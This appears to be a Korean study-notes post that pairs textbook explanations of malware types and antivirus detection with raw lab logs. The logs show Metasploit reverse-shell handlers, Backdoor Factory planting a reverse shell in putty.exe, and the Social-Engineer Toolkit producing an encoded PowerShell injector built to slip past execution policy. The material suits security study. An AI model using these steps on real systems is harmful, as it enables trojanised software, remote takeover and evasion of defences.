22Hz

Viruses(바이러스)

A virus is a set of malicious code that attaches itself to a host application. The host application must be executed to run, and the malicious code executes when the host application is executed. The virus tries to replicate by finding other host applications to infect with the malicious code. At some point, the virus activates and delivers its payload.

Typically, the payload of a virus is damaging. It may delete files, cause random reboots, join the computer to a botnet, or enable backdoors that attackers can use to access systems remotely. Some older viruses merely displayed a message at some point, such as “Legalize Marijuana!” Most viruses won’t cause damage immediately. Instead, they give the virus time to replicate first.

A user will often execute the virus (though unknowingly), but other times, an operating system will automatically execute it after user interaction. For example, when a user plugs in an  infected USB drive, the system can execute the virus infecting the system. Note that not all malware needs user interaction to run. As an example, worms are self-replicating and do not need user interaction.

Worms(웜)

A worm is self-replicating malware that travels throughout a network without the assistance of a host application or user interaction. A worm resides in memory and is able to use different transport protocols to travel over the network.

One of the significant problems caused by worms is that they consume network bandwidth.

Worms can replicate themselves hundreds of times and spread to all the systems in the network. Each infected system tries to locate and infect other systems on the network, and network performance can slow to a crawl.

Logic Bombs

A logic bomb is a string of code embedded into an application or script that will execute in response to an event. The event may be a specific date or time, when a user launches a specific program, or any event the programmer decides on.

There’s an often-repeated story about a company that decided it had to lay off an engineer due to an economic downturn. His bosses didn’t see him doing much, so they thought they could do without him. Within a couple of weeks after he left, they started having all sorts of computer problems they just couldn’t resolve.

They called him back, and within a couple of weeks, everything was fine. A few months later, they determined they had to lay him off again. You guessed it. Within a couple of weeks, things went haywire again.

The engineer had programmed a logic bomb that executed when the payroll program ran. It

checked for his name on the payroll, and when it was there, things were fine, but when his name wasn’t there, ka-boom!—he logic bomb exploded.

A logic bomb executes in response to an event, such as when a specific application is executed or a specific time arrives.

Backdoors

A backdoor provides another way of accessing a system, similar to how a backdoor in a house provides another method of entry. Malware such as Trojans often install backdoors on systems to bypass normal authentication methods.

Application developers often code backdoors into applications, but this practice is not

recommended. For example, an application developer might create a backdoor within an application intended for maintenance purposes. However, if attackers discover the backdoor, they can use it to access the application.

Effective account management policies help prevent ex-employees from creating backdoors after they are fired. For example, if an employee loses network access immediately after being fired, the employee cannot create a backdoor account. In contrast, if an administrator retains network access, he has the opportunity to create another administrative account that he can use even if his original account is disabled. That’s exactly what a Fannie Mae Unix engineer did after being told he was fired.

Fannie Mae’s account management policy did not revoke his elevated system privileges right away, giving him time to create a backdoor account. After going home, he accessed the system remotely and installed a logic bomb script scheduled to run at 9:00 a.m. on January 31. If another administrator hadn’t discovered the logic bomb, it would have deleted data and backups for about four thousand servers, changed their passwords, and shut them down.

A backdoor provides another of way of accessing a system. Many types of malware create backdoors, allowing attackers to access systems from remote locations. Employees have also created backdoors in applications and systems.

Trojans

A Trojan, also called a Trojan horse, looks like something beneficial, but it’s actually something malicious. According to a report by PandaLabs, Trojans represented over 70 percent of new malware strains in 2013, and they also represented 78 percent of malware infections. Trojans frequently create backdoors, allowing criminals to connect to systems remotely after they are infected.

Trojan horses are named after the infamous horse from the Trojan War. In Greek mythology, the Achaeans tried to sack the city of Troy for several years, but they simply couldn’t penetrate the city’s defenses. At some point, someone got the idea of building a huge wooden horse and convincing the people of Troy that it was a gift from the gods. Warriors hid inside, and the horse was rolled up to the gates.

The people of Troy partied all day and all night celebrating their good fortune, but when the city slept, the warriors climbed down from inside the horse and opened the gates. The rest of the warriors flooded in. What the Greek warriors couldn’t do for years, the Trojan horse helped them do in a single day.

In computers, a Trojan horse can come as pirated software, a cool screen saver, a useful  utility, a game, or something else that users may be enticed to download and try. Attackers are increasingly using drive-by downloads to deliver Trojans. In a drive-by download, web servers include malicious code that attempts to download and install itself on user computers after the user visits. Here are the typical steps involved in a drive-by download:

● Attackers compromise a web site to gain control of it.

● Attackers install a Trojan embedded in the web site’s code.

● Attackers attempt to trick users into visiting the site. Sometimes, they simply send the link to thousands of users via email hoping that some of them click the link.

● When users visit, the web site attempts to download the Trojan onto the users’ systems.

Another Trojan method that has become popular in recent years is rogueware, also known as

scareware. Rogueware masquerades as a free antivirus program. When a user visits a site, a message on the web page or a pop-up appears indicating it detected malware on the user’s system. The user is encouraged to download and install free antivirus software.

On the surface, this free antivirus software looks useful. However, it isn’t. If a user installs and runs it on a system, it appears to do a system scan. After the scan completes, it reports finding multiple issues, such as infections by dozens of viruses. The report isn’t true. The application reports these issues even on a freshly installed operating system with zero infections.

It then encourages the user to resolve these issues immediately. If the user tries to  resolve the issues, the program informs the user that this is only the trial version, and the trial version won’t resolve these issues. However, for the small fee of $79.95, users can unlock the full version to remove the threats. Some rogueware installs additional malicious components. For example, it can join the computer to a botnet, or allow the attacker to take remote control of the infected system.

As mentioned previously, you can also infect a system by plugging in an infected USB flash

drive. In this case, the attacker can install the Trojan onto several USB drives and leave them lying around. Someone picks one up, plugs it in, and the system is infected. The system then infects other USBs, which infect other systems.

A Trojan appears to be something useful but includes a malicious component, such as installing a backdoor on a user’s system. Many Trojans are delivered via drive-by downloads. They can also infect systems from rogueware, pirated software, games, or infected USB drives.

Botnets

A botnet combines the words robot and network. It includes multiple computers that act as

software robots and function together in a network (such as the Internet), often for malicious purposes. The computers in a botnet are called zombies and they will do the bidding of whoever controls the botnet.

Bot herders are criminals who manage botnets. They attempt to infect as many computers as

possible and control them through one or more servers running command-and-control software. The infected computers periodically check in with the command-and-control servers, receive direction, and then go to work. The user is often unaware of the activity.

Most computers join a botnet through malware infection. For example, a user could download

pirated software with a Trojan or click a malicious link, resulting in a drive-by download. The malware then joins the system to a botnet.

As an example, Coreflood malware is a Trojan horse that opens a backdoor on compromised

computers. Authorities shut down the Coreflood botnet in April 2011, and its command-and-control servers managed about 2.3 million computers at that time. Experts estimate they had stolen between $10 million and $100 million before authorities shut them down.

Infecting 2.3 million computers and stealing tens of millions of dollars draws a lot of attention.

To avoid attention, many botnets manage fewer than 50,000 computers and fly under the radar of most authorities. The result is the same for the victims, though. It doesn’t matter if victims are robbed by a huge botnet or a smaller botnet; they have still been robbed.

Botnet herders sometimes maintain complete control over their botnets. Other times, they rent access out to others to use as desired. Some of the instructions sent by the command-and-control servers include:

● Send spam.

● Launch a distributed denial-of-service attack.

● Download additional malware, adware, or spyware such as keyloggers.

Ransomware(랜섬웨어)

A specific type of Trojan is ransomware. Attackers take control of the user’s computer and then demand the user pay a ransom to get the control back. Criminals often deliver ransomware via driveby downloads or embedded in other software. Two ransomware viruses that have attacked many people are the Police Virus and CryptoLocker, and they provide good examples of how ransomware works.

Ransomware is a type of malware that takes control of a user’s system or data. Criminals then attempt to extort payment from the victim. Ransomware often includes threats of damaging a user’s system or data if the victim does not pay the ransom.

Rootkits

A rootkit is a group of programs (or, in rare instances, a single program) that hides the fact that the system has been infected or compromised by malicious code. A user may suspect something is wrong, but antivirus scans and other checks may indicate everything is fine because the rootkit hides its running processes to avoid detection.

In addition to modifying the internal operating system processes, rootkits often modify system files such as the Registry. In some cases, the rootkit modifies system access, such as removing users’administrative access.

Rootkits have system-level access to systems. This is sometimes called root-level access, or kernel-level access, indicating that they have the same level of access as the operating system.

Rootkits use hooked processes, or hooking techniques, to intercept calls to the operating system. In this context, hooking refers to intercepting system-level function calls, events, or messages. The rootkit installs the hooks into memory and uses them to control the system’s behavior.

Antivirus software often makes calls to the operating system that could detect malware, but the rootkit prevents the antivirus software from making these calls. This is why antivirus software will sometimes report everything is OK, even if the system is infected with a rootkit. However, antivirus software can often detect the hooked processes by examining the contents of the system’s random access memory (RAM).

Another method used to detect rootkits is to boot into safe mode, or have the system scanned before it boots, but this isn’t always successful. It’s important to remember that rootkits are very difficult to detect because they can hide so much of their activity. A clean bill of health by a malware scanner may not be valid.

The Trojan.Popureb/E rootkit is an example of a rootkit. Among other things, it overwrites the hard drive’s Master Boot Record (MBR), where code is stored to start the operating system. The code on the MBR starts before the operating system boots and it remains invisible to the operating system and security software. Even when antivirus software detects the rootkit, the rootkit protects itself. It prevents any attempts to overwrite the MBR by changing write operations to read operations, though it reports that the write operation completed successfully.

It’s important to remember that behind any type of malware, you’ll likely find an attacker involved in criminal activity. Attackers who have successfully installed a rootkit on a user’s system might log on to the user’s computer remotely, using a backdoor installed by the rootkit. Similarly, attackers might direct the computer to connect to computers on the Internet and send data. Data can include anything collected from a keylogger, collected passwords, or specific files or file types stored on the user’s computer.

Rootkits have system-level or kernel-level access and can modify system files and system access. Rootkits hide their running processes to avoid detection with hooking techniques. Tools that can inspect RAM can discover these hidden hooked processes .

Spyware

Spyware is software installed on users’ systems without their awareness or consent. Its purpose is often to monitor the user’s computer and the user’s activity. Spyware takes some level of control over the user’s computer to learn information and sends this information to a third party. If spyware can access a user’s private data, it results in a loss of confidentiality.

Some examples of spyware activity are changing a user’s home page, redirecting web browsers, and installing additional software, such as search engines. In some situations, these changes can slow a system down, resulting in poorer performance. These examples are rather harmless compared with what more malicious spyware (called privacy-invasive software) may do.

Privacy-invasive software tries to separate users from their money using data-harvesting

techniques. It attempts to gather information to impersonate users, empty bank accounts, and steal identities. For example, some spyware includes keyloggers used to capture keystrokes. The keystrokes are stored in a file, and the spyware periodically sends the file to the attacker. In some instances, the spyware allows the attacker to take control of the user’s system remotely.

Spyware is often included with other software like a Trojan. The user installs one application but unknowingly gets some extras. Spyware can also infect a system in a drive-by download. The user simply visits a malicious web site that includes code to automatically download and install the spyware onto the user’s system.

Adware(Advertisement Software)

When adware first emerged, its intent was usually to learn a user’s habits for the purpose of targeted advertising. As the practice of gathering information on users became more malicious, more people began to call it spyware. However, some traditional adware still exists.

A common type of adware is pop-ups. For example, while you are visiting a site, another

browser window appears, or pops up, with an advertisement. These pop-up windows aren’t

malicious, but they are annoying.

Sometimes pop-ups can be helpful. As a legitimate example, my online bank has interest-rate information that I can view. When I click on this link, it pops up another window showing the interestrate information without taking me away from the current page I’m viewing.

The term adware also applies to software that is free but includes advertisements. The user is well aware that the advertisements appear, and has the option to purchase a version of the software that does not include the ads. All of this is aboveboard without any intention of misleading the user.

Spyware monitors a user’s computer. Pop-ups are annoying windows that appear while browsing. Many pop-ups are adware designed to market products to users.

Hoax

실제로 족재하지 않지만 사용자들이 하여금 믿게 하기 위하여 정상파일을 악성코드로 속이는 행위이다.

자기복제

감염대상

형태

복구방법

바이러스

O

O

기생/겹침

치료

트로이목마

X

X

독립

삭제

윔

O

X

독립

삭제

Spam(스팸)

Spam is unwanted or unsolicited email. Depending on which study you quote, between 80 percent and 92 percent of all Internet email is spam. Some spam is harmless advertisements, while much more is malicious. Spam can include malicious links, malicious code, or malicious attachments.

Even when it’s not malicious, when only 1 of 10 emails is valid, it can waste a lot of your time. In some cases, legitimate companies encourage users to opt-in to their email lists and then send them email about their products. When users opt-in to a mailing list, they agree to the terms. On the surface, you’d think that this means that you agree to receive email from the company and that’s true.

However, terms often include agreeing to allow their partners to send you email, which means the original company can share your email address with others.

Legitimate companies don’t send you malicious spam, but they might send you more email than you want. Laws require them to include the ability to opt-out, indicating you don’t want to receive any more emails from them. Once you opt-out, you shouldn’t receive any more emails from that company.

Originally, spam was just unwanted advertisements sent out to people, even if they chose to optout.

However, attackers began using spam for malicious purposes. Attackers often include malicious attachments and malicious code within spam email. More recently, spam attacks include malicious links. If users click on a link in a malicious email, it often takes them to a site hosting a drive-by download, as mentioned in the earlier “Trojan” section.

Criminals use a variety of methods to collect email addresses. They buy lists from other

criminals and harvest them from web sites. Some malware scans address books of infected computers to collect email. Because they are criminals, they don’t care about laws, but they might include optout instructions in spam they send. However, instead of this getting you off the email list, it provides them confirmation that your email address is valid. The result is more spam.

Phishing

Phishing is the practice of sending email to users with the purpose of tricking them into revealing personal information or clicking on a link. A phishing attack often sends the user to a malicious web site that appears to the user as a legitimate site.

The classic example is where a user receives an email that looks like it came from eBay,

PayPal, a bank, or some other well-known company. The “phisher” doesn’t know if the recipient has an account at the company, just as a fisherman doesn’t know if any fish are in the water where he casts his line. However, if the attacker sends out enough emails, the odds are good that someone who receives the email has an account.

The email may look like this:

“We have noticed suspicious activity on your account. To protect your privacy, we will suspend your account unless you are able to log in and validate your credentials. Click here to validate your account and prevent it from being locked out.”

The email often includes the same graphics that you would find on the vendor’s web site or an actual email from the vendor. Although it might look genuine, it simply isn’t. Legitimate companies do not ask you to revalidate your credentials via email. If you go directly to the site, you might be asked to provide additional information to prove your identity beyond your credentials, but legitimate companies don’t send emails asking you to follow a link and input your credentials to validate them.

Spam is unwanted email. Phishing is malicious spam. Attackers attempt to trick users into revealing sensitive or personal information or clicking on a link. Links within email can also lead unsuspecting users to install malware .

Spear Phishing

Spear phishing is a targeted form of phishing. Instead of sending the email out to everyone indiscriminately, a spear phishing attack attempts to target specific groups of users, or even a single user. Spear phishing attacks may target employees within a company or customers of a company.

As an example, an attacker might try to impersonate the CEO of an organization in an email. It’s relatively simple to change the header of an email so that the From field includes anything, including the CEO’s name and title. Attackers can send an email to all employees requesting that they reply with their password. Because the email looks like it’s coming from the CEO, these types of phishing emails fool many users.

One solution that deters the success of these types of spear phishing attacks is to use digital signatures. The CEO and anyone else in the company can sign their emails with a digital signature.

This provides a high level of certainty to personnel on who sent the email. Chapter 10,

“Understanding Cryptography,” covers digital signatures in great depth.

Signature-Based Detection(스그니쳐 기반 감지)

Viruses and other malware have known patterns. Signature files (also called data definition files) define the patterns, and the antivirus software scans files for matching patterns. When the software identifies a matching pattern, it reports it as an infection and takes action, such as deleting or quarantining the file.

A quarantined virus is not harmful to the system while it is in quarantine, but it’s still available for analysis. As an example, a security professional could release a quarantined virus into an unprotected but isolated virtual environment for research and study.

Malware developers constantly release new viruses, so it’s important to update signature definition files regularly. Most antivirus software includes the ability to automate the process of checking and downloading updated signature definition files. They typically check for updates several times a day.

It’s also possible to download and install signature files manually. Administrators do this when updating systems that do not have Internet access. When doing so, it’s important for administrators to ensure the signature file has not lost data integrity. They do so by comparing the hash of the signature file posted on the antivirus vendor’s web site with the hash of the downloaded file. To see an example of how to compare hashes, check out the Creating and Comparing Hashes Lab. You can access the online exercises for this book at http://gcgapremium.com/labs/.

Antivirus software detects and removes malware, such as viruses, Trojans, and worms. Signature-based antivirus software detects known malware based on signature definitions. Heuristic-based software detects previously unknown malware based on behavior.

Heuristic-Based Detection(행위 기반 감지/체험 기반 감지)

Some antivirus software includes heuristic-based detection. Heuristic-based detection attempts to detect viruses that were previously unknown and do not have signatures. This includes zero-day exploits, mentioned in Chapter 4, “Securing Your Network.”

Heuristic-based analysis runs questionable code in a sandbox or virtualized environment specifically designed to protect the live environment, while it observes its behavior. Most viruses engage in viral activities—ctions that can be harmful, but are rarely performed by legitimate programs. The heuristic-based analysis detects these viral activities.

As an example, polymorphic malware adds variations to files when it creates copies. It’s highly unusual for any application to add variations in files like this, and heuristic methods are often successful at detecting polymorphic malware.

Checking File Integrity(파일 무결성 점검)

Some antivirus scanners use file integrity checkers to detect modified system files. A file integrity checker calculates hashes on system files as a baseline. It then periodically recalculates the hashes on these files and compares them with the hashes in the baseline. If the hashes are ever different, it indicates the system files have been modified. When an antivirus scanner detects a modified file, it sends an alert. Many times these alerts can detect rootkit infections.

When searching for rootkits, antivirus scanners also have the ability to inspect RAM.

분석 도구 이름

분석 도구 종류

분석도구 다운로드 사이트

Frhed HexaEditor

Hexa Editor

www.klbrla.de

UltraEdit

Hexa Editor

www.ultraedit.com

Process Explorer

프로세스, thread, DLL  실행 정보

www.sysinternals.com

Dependency Walker

DLL, Export 함수 정보

www.microsoft.com

FileMon

파일시스템 변경 모니터링

www.sysinternals.com

RegMon

레지스트리 변경 모니터링

www.sysinternals.com

TCPView

통신 포트 모니터링

www.sysinternals.com

Active Ports

통신 포트 모니터링

www.proctect-me.com

Analyzer

네트워크 패킷 캡쳐

www.analyzer.pollto.it

Ethereal

네트워크 패킷 캡쳐

www.ethereal.com

LoadPE

실행 프로세스 Dump 및 PE Rebuild

y0da.cjb.net

PEID

PE 정보 획득

peld.has.it

OllyDbg

범용디버거

www.ollydbg.de

IDA

디스어셈블러

www.datarescue.com

WinDbg

User/Kernel mode 디버거

www.microsoft.com

SoftICE

User/Kernel mode 디버거

www.compuware.com

use exploit/multi/handler

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.20.50

set ExitSession false

exploit -j -z

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86_64 from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 510 bytes

Saved as: reverse_test.exe

reverse_resource2.rc  reverse_resource.rc  reverse_test.exe

Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.8-Debian]

        Sharename       Type      Comment

        ---------       ----      -------

        print$          Disk      Printer Drivers

        share           Disk      Kali Linux Shared Directory

        IPC$            IPC       IPC Service (Samba 4.3.8-Debian)

Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.8-Debian]

        Server               Comment

        ---------            -------

        Workgroup            Master

        ---------            -------

..... (중략) .....

Love leveraging credentials? Check out bruteforcing

in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.5-2016010401                   ]

+ -- --=[ 1517 exploits - 875 auxiliary - 257 post        ]

+ -- --=[ 437 payloads - 37 encoders - 8 nops             ]

+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing reverse_resource.rc for ERB directives.

resource (reverse_resource.rc)> use exploit/multi/handler

resource (reverse_resource.rc)> set PAYLOAD windows/x64/meterpreter/reverse_tcp

PAYLOAD => windows/x64/meterpreter/reverse_tcp

resource (reverse_resource.rc)> set LHOST 192.168.20.50

LHOST => 192.168.20.50

resource (reverse_resource.rc)> set ExitSession false

ExitSession => false

resource (reverse_resource.rc)> exploit -j -z

[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.20.50:4444

msf exploit(handler) > [*] Starting the payload handler...

[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.20.50:4444

msf exploit(handler) > [*] Starting the payload handler...

[*] Sending stage (1188911 bytes) to 192.168.20.202

[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.202:53197) at 2016-07-06 13:33:21 +0900

<ENTER>

msf exploit(handler) > sessions -i

Active sessions

===============

  Id  Type                   Information                      Connection

  --  ----                   -----------                      ----------

  1   meterpreter x64/win64  soldesk-PC\soldesk @ SOLDESK-PC  192.168.20.50:4444 -> 192.168.20.202:53197 (192.168.20.202)

msf exploit(handler) >

문서/    다운로드/     expect.log  keys.txt            scan1.xml  shellexe2*   test*

음악/    바탕화면/     expect.sh*  myshellcode.c       scan2.xml  shellexe2.c  test.dtd

공개/    backdoor.php  fimap.log   mysql_HKD.pl*       scan.txt   shellexe.c   workspace/

서식/    bin/          ftp.log     mysql_HKD.pl.TXT    shell/     sshkeys.txt

사진/    cmd.sh*       ftp.sh*     paros/              shell.c    telnet.log

비디오/  core          icmp.cap    pentbox-1.8.tar.gz  shellexe*  telnet.sh*

putty.exe

putty.exe

    ____  ____  ______           __     

   / __ )/ __ \/ ____/___ ______/ /_____  _______  __

  / __  / / / / /_  / __ `/ ___/ __/ __ \/ ___/ / / /

 / /_/ / /_/ / __/ / /_/ / /__/ /_/ /_/ / /  / /_/ /

/_____/_____/_/    \__,_/\___/\__/\____/_/   \__, /

                                            /____/

         Author:    Joshua Pitts

         Email:     the.midnite.runr[-at ]gmail<d o-t>com

         Twitter:   @midnite_runr

         IRC:       freenode.net #BDFactory

         Version:   3.3.1

Usage: backdoor.py [options]

Options:

  -h, --help            show this help message and exit

  -f FILE, --file=FILE  File to backdoor

  -s SHELL, --shell=SHELL

                        Payloads that are available for use. Use 'show' to see

                        payloads.

  -H HOST, --hostip=HOST

                        IP of the C2 for reverse connections.

  -P PORT, --port=PORT  The port to either connect back to for reverse shells

                        or to listen on for bind shells

  -J, --cave_jumping    Select this options if you want to use code cave

                        jumping to further hide your shellcode in the binary.

  -a, --add_new_section

                        Mandating that a new section be added to the exe

                        (better success) but less av avoidance

  -U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE

                        User supplied shellcode, make sure that it matches the

                        architecture that you are targeting.

  -c, --cave            The cave flag will find code caves that can be used

                        for stashing shellcode. This will print to all the

                        code caves of a specific size.The -l flag can be use

                        with this setting.

  -l SHELL_LEN, --shell_length=SHELL_LEN

                        For use with -c to help find code caves of different

                        sizes

  -o OUTPUT, --output-file=OUTPUT

                        The backdoor output file

  -n NSECTION, --section=NSECTION

                        New section name must be less than seven characters

  -d DIR, --directory=DIR

                        This is the location of the files that you want to

                        backdoor. You can make a directory of file backdooring

                        faster by forcing the attaching of a codecave to the

                        exe by using the -a setting.

  -w, --change_access   This flag changes the section that houses the codecave

                        to RWE. Sometimes this is necessary. Enabled by

                        default. If disabled, the backdoor may fail.

  -i, --injector        This command turns the backdoor factory in a hunt and

                        shellcode inject type of mechanism. Edit the target

                        settings in the injector module.

  -u SUFFIX, --suffix=SUFFIX

                        For use with injector, places a suffix on the original

                        file for easy recovery

  -D, --delete_original

                        For use with injector module.  This command deletes

                        the original file.  Not for use in production systems.

                        *Author not responsible for stupid uses.*

  -O DISK_OFFSET, --disk_offset=DISK_OFFSET

                        Starting point on disk offset, in bytes. Some authors

                        want to obfuscate their on disk offset to avoid

                        reverse engineering, if you find one of those files

                        use this flag, after you find the offset.

  -S, --support_check   To determine if the file is supported by BDF prior to

                        backdooring the file. For use by itself or with

                        verbose. This check happens automatically if the

                        backdooring is attempted.

  -M, --cave-miner      Future use, to help determine smallest shellcode

                        possible in a PE file

  -q, --no_banner       Kills the banner.

  -v, --verbose         For debug information output.

  -T IMAGE_TYPE, --image-type=IMAGE_TYPE

                        ALL, x86, or x64 type binaries only. Default=ALL

  -Z, --zero_cert       Allows for the overwriting of the pointer to the PE

                        certificate table effectively removing the certificate

                        from the binary for all intents and purposes.

  -R, --runas_admin     EXPERIMENTAL Checks the PE binaries for

                        'requestedExecutionLevel level="highestAvailable"'. If

                        this string is included in the binary, it must run as

                        system/admin. If not in Support Check mode it will

                        attmept to patch highestAvailable into the manifest if

                        requestedExecutionLevel entry exists.

  -L, --patch_dll       Use this setting if you DON'T want to patch DLLs.

                        Patches by default.

  -F FAT_PRIORITY, --fat_priority=FAT_PRIORITY

                        For MACH-O format. If fat file, focus on which arch to

                        patch. Default is x64. To force x86 use -F x86, to

                        force both archs use -F ALL.

  -B BEACON, --beacon=BEACON

                        For payloads that have the ability to beacon out, set

                        the time in secs

  -m PATCH_METHOD, --patch-method=PATCH_METHOD

                        Patching methods for PE files, 'manual','automatic',

                        and onionduke

  -b SUPPLIED_BINARY, --user_malware=SUPPLIED_BINARY

                        For onionduke. Provide your desired binary.

  -X, --xp_mode         Default: DO NOT support for XP legacy machines, use -X

                        to support XP. By default the binary will crash on XP

                        machines (e.g. sandboxes)

  -A, --idt_in_cave     EXPERIMENTAL By default a new Import Directory Table

                        is created in a new section, by calling this flag it

                        will be put in a code cave.  This can cause bianry

                        failure is some cases. Test on target binaries first.

  -C, --code_sign       For those with codesigning certs wishing to sign PE

                        binaries only. Name your signing key and private key

                        signingcert.cer and signingPrivateKey.pem repectively

                        in the certs directory it's up to you to obtain

                        signing certs.

..... (중략) .....

         Author:    Joshua Pitts

         Email:     the.midnite.runr[-at ]gmail<d o-t>com

         Twitter:   @midnite_runr

         IRC:       freenode.net #BDFactory

         Version:   3.3.1

[*] In the backdoor module

[*] Checking if binary is supported

[*] Gathering file info

[*] Reading win32 entry instructions

The following WinIntelPE32s are available: (use -s)

   cave_miner_inline

   iat_reverse_tcp_inline

   iat_reverse_tcp_inline_threaded

   iat_reverse_tcp_stager_threaded

   iat_user_supplied_shellcode_threaded

   meterpreter_reverse_https_threaded

   reverse_shell_tcp_inline

   reverse_tcp_stager_threaded

   user_supplied_shellcode_threaded

    ____  ____  ______           __     

   / __ )/ __ \/ ____/___ ______/ /_____  _______  __

  / __  / / / / /_  / __ `/ ___/ __/ __ \/ ___/ / / /

 / /_/ / /_/ / __/ / /_/ / /__/ /_/ /_/ / /  / /_/ /

/_____/_____/_/    \__,_/\___/\__/\____/_/   \__, /

                                            /____/

         Author:    Joshua Pitts

         Email:     the.midnite.runr[-at ]gmail<d o-t>com

         Twitter:   @midnite_runr

         IRC:       freenode.net #BDFactory

         Version:   3.3.1

[*] In the backdoor module

[*] Checking if binary is supported

[*] Gathering file info

[*] Reading win32 entry instructions

[*] Gathering file info

[*] Overwriting certificate table pointer

[*] Loading PE in pefile

[*] Parsing data directories

[*] Looking for and setting selected shellcode

[*] Creating win32 resume execution stub

[*] Looking for caves that will fit the minimum shellcode length of 409

[*] All caves lengths:  409

############################################################

The following caves can be used to inject code and possibly

continue execution.

**Don't like what you see? Use jump, single, append, or ignore.**

############################################################

[*] Cave 1 length as int: 409

[*] Available caves:

1. Section Name: None; Section Begin: None End: None; Cave begin: 0x29c End: 0xffc; Cave Size: 3424

2. Section Name: .rdata; Section Begin: 0x5d000 End: 0x7b000; Cave begin: 0x7a47c End: 0x7b000; Cave Size: 2948

3. Section Name: .data; Section Begin: 0x7b000 End: 0x7d000; Cave begin: 0x7b9e5 End: 0x7bc0c; Cave Size: 551

4. Section Name: None; Section Begin: None End: None; Cave begin: 0x7c400 End: 0x7d00a; Cave Size: 3082

**************************************************

[!] Enter your selection: 3

[!] Using selection: 3

[*] Changing flags for section: .data

[*] Patching initial entry instructions

[*] Creating win32 resume execution stub

[*] Looking for and setting selected shellcode

File putty.exe is in the 'backdoored' directory

backdoored/  putty.exe

Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...

        the matrix has you

      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,

                        ` `.    ,;' /

                         `.  ,'/ .'

                          `. X /.'

                .-;--''--.._` ` (

              .'            /   `

             ,           ` '   Q '

             ,         ,   `._    \

          ,.|         '     `-.;_'

          :  . `  ;    `  ` --,.._;

           ' `    ,   )   .'

              `._ ,  '   /_

                 ; ,''-,;' ``-

                  ``-..__``--`

                             http://metasploit.pro

Taking notes in notepad? Have Metasploit Pro track & report

your progress and findings -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.5-2016010401                   ]

+ -- --=[ 1517 exploits - 875 auxiliary - 257 post        ]

+ -- --=[ 437 payloads - 37 encoders - 8 nops             ]

+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.20.50

LHOST => 192.168.20.50

msf exploit(handler) > set LPORT 8080

LPORT => 8080

msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.20.50:8080

[*] Starting the payload handler...

..... (중략) .....

[*] Started reverse TCP handler on 192.168.20.50:8080

[*] Starting the payload handler...

[*] Sending stage (957487 bytes) to 192.168.20.202

[*] Meterpreter session 1 opened (192.168.20.50:8080 -> 192.168.20.202:53273) at 2016-07-06 15:03:09 +0900

meterpreter >

Last login: Tue Jun 28 17:53:30 2016 from 192.168.10.1

                 .--.  .--. .-----.

                : .--': .--'`-. .-'

                `. `. : `;    : :

                 _`, :: :__   : :

                `.__.'`.__.'  :_;

[---]        The Social-Engineer Toolkit (SET)         [---]

[---]        Created by: David Kennedy (ReL1K)         [---]

[---]                Version: 7.1.1                    [---]

[---]             Codename: 'Blue Steel'               [---]

[---]        Follow us on Twitter: @TrustedSec         [---]

[---]        Follow me on Twitter: @HackingDave        [---]

[---]       Homepage: https://www.trustedsec.com       [---]

        Welcome to the Social-Engineer Toolkit (SET).

         The one stop shop for all of your SE needs.

     Join us on irc.freenode.net in channel #setoolkit

   The Social-Engineer Toolkit is a product of TrustedSec.

             Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks

   2) Fast-Track Penetration Testing

   3) Third Party Modules

   4) Update the Social-Engineer Toolkit

   5) Update SET configuration

   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1

 Select from the menu:

   1) Spear-Phishing Attack Vectors

   2) Website Attack Vectors

   3) Infectious Media Generator

   4) Create a Payload and Listener

   5) Mass Mailer Attack

   6) Arduino-Based Attack Vector

   7) Wireless Access Point Attack Vector

   8) QRCode Generator Attack Vector

   9) Powershell Attack Vectors

  10) Third Party Modules

  99) Return back to the main menu.

set> 9

The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful  landscape for deploying payloads and performing functions that  do not get triggered by preventative technologies.

   1) Powershell Alphanumeric Shellcode Injector

   2) Powershell Reverse Shell

   3) Powershell Bind Shell

   4) Powershell Dump SAM Database

  99) Return to Main Menu

set:powershell>1

set> IP address for the payload listener (LHOST): 192.168.20.50

set:powershell> Enter the port for the reverse [443]:443

[*] Prepping the payload for delivery and injecting alphanumeric shellcode...

[*] Generating x86-based powershell injection code...

[*] Finished generating powershell injection bypass.

[*] Encoded to bypass execution restriction policy...

[*] If you want the powershell commands and attack, they are exported to /root/.set/reports/powershell/

set> Do you want to start the listener now [yes/no]: : yes

# cowsay++

 ____________

< metasploit >

 ------------

       \   ,__,

        \  (oo)____

           (__)    )\

              ||--|| *

Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro

Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.5-2016010401                   ]

+ -- --=[ 1517 exploits - 875 auxiliary - 257 post        ]

+ -- --=[ 437 payloads - 37 encoders - 8 nops             ]

+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing /root/.set/reports/powershell/powershell.rc for ERB directives.

resource (/root/.set/reports/powershell/powershell.rc)> use multi/handler

resource (/root/.set/reports/powershell/powershell.rc)> set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

resource (/root/.set/reports/powershell/powershell.rc)> set LPORT 443

LPORT => 443
